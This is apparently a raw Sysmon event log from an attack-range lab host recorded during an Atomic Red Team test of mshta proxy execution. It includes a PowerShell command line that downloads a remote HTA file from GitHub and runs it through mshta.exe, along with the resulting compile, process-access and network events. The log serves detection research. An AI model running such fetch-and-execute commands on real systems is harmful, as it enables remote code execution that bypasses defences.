16:01:21.456{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000028939Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028938Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.456{7901BC46-53CF-6008-9B06-00000000A301}61884124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+7c18d9|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+d41c3b48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\db79b1cc2b753cce16ad58d141a194ca\Microsoft.PowerShell.Commands.Utility.ni.dll+d41c3b48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49628357(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49604130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49603e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4a0b5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+495c4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+49622e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+496064cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+4960635c(wow64) 154100x800000000000000028937Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.458{7901BC46-53D1-6008-9C06-00000000A301}7908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\bfo3jm2b.cmdline"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath $env:windir\system32\mshta.exe} 11241100x800000000000000028936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.441{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\bfo3jm2b.cmdline2021-01-20 16:01:21.441 11241100x800000000000000028935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:21.441{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\bfo3jm2b\bfo3jm2b.dll2021-01-20 16:01:21.441 10341000x800000000000000028934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.144{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.144{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.097{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.097{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53CF-6008-9B06-00000000A301}6188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.300{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.300{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.300{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000029045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.284{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\4SJ06GRQ\T1218.005[1].hta2021-01-20 16:01:22.284 10341000x800000000000000029044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.050{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.034{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:22.034{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000029049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.922{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\System32\mshta.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-283.attackrange.local57510-false151.101.52.133-443https 22542200x800000000000000029050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:21.909{7901BC46-53D1-6008-A006-00000000A301}4404raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;C:\Windows\System32\mshta.exe 11241100x800000000000000029121Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.localDLL2021-01-20 16:01:38.956{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\agaabhld\agaabhld.dll2021-01-20 16:01:38.862 10341000x800000000000000029120Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A706-00000000A301}6248C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029119Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029118Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-53E2-6008-A706-00000000A301}6248C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.940{7901BC46-53E2-6008-A606-00000000A301}35165284C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{7901BC46-53E2-6008-A706-00000000A301}6248C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.948{7901BC46-53E2-6008-A706-00000000A301}6248C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES98D2.tmp" "c:\Users\Administrator\AppData\Local\Temp\agaabhld\CSCEF0DDB15906549189E873560603B69E.TMP"C:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\agaabhld\agaabhld.cmdline" 10341000x800000000000000029112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-4FA9-6008-4405-00000000A301}70003220C:\Windows\system32\conhost.exe{7901BC46-53E2-6008-A606-00000000A301}3516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:38.862{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 